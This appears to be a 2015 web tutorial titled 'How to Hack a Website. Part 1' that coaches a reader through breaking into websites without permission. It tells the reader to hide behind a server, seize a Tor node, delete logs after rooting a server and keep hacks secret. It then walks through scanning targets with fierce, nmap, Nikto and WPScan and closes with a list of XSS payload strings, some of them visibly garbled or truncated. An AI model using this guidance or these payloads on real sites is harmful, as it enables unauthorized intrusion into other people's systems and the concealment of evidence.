How to Hack a Website. Part 1

Aug 6, 2015 03:15 AM

Part 1: Staying Anonymous

1.) Install Whonix - "Whonix is a Debian GNU/Linux based security-focused Linux distribution. It aims to provide privacy, security and anonymity on the internet. The operating system consists of two virtual machines, a "Workstation" and a Tor "Gateway", running Debian GNU/Linux." Basically: Whonix will send all your requests through Tor.

2.) That step is for testing. Do not actually hack over Tor! You could use a virtual private server based in Sweden or something, or you could also seize a tor node and make it your own. There are always multiple options for something. Using a virtual private server is usually the best way to go. I recommend that myself.

3.) Once you have rooted the server, remember to remove all the logs. Keep that in mind.

4.) Use realistic user-agents. You can use this one for example: Mozilla/4.0 (compatible; MSIE 5.5; Windows 95)

5.) This step is common sense. Do not tell anyone about your hacks. You could, I guess, tell them to online people while using a virtual private network, but not to in real life people. This is what will get you caught, eventually.

Part 2: Mapping out the target

1.) Mapping out a target is a crucial step! We must always remember that to hack your target, you must find a vulnerability. To find one, you must know your target, entirely!

2.) Use a DNS Domain Scanner - You could use Fierce to find subdomains in a target. If you're using Kali Linux, just type in fierce.pl -dns website.com

3.) Check out all those websites. You might find something good. A login vulnerable to SQL Injection, possibly.

Part 3: Vulnerability finding

1.) Scan the services with nmap

2.) Maybe they have an FTP server that allows anonymous read/write access to something quite important. Believe it or not, some do.

3.) Maybe it has an old software. You could most probably find an exploit for it online. :)

4.) REMEMBER TO LOOK AT ALL THE SUBDOMAINS!

5.) You can run Nikto (A vulnerability scanner). Nikto will do automated requests and find a vulnerability in the system.

6.) Once you know what software the website is running, e.g Wordpress, use WPScan.

I will show you how to get r00t in the next episode.

For a treat, I'll give you guys this:

Multiple and advanced XSS requests:







">

";alert(/null/);a =" \' nullbyte

#!">//

x" autofocus onfocus="alert('null')

Sos" onmouseover="alert('null')"/

">

">



">

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!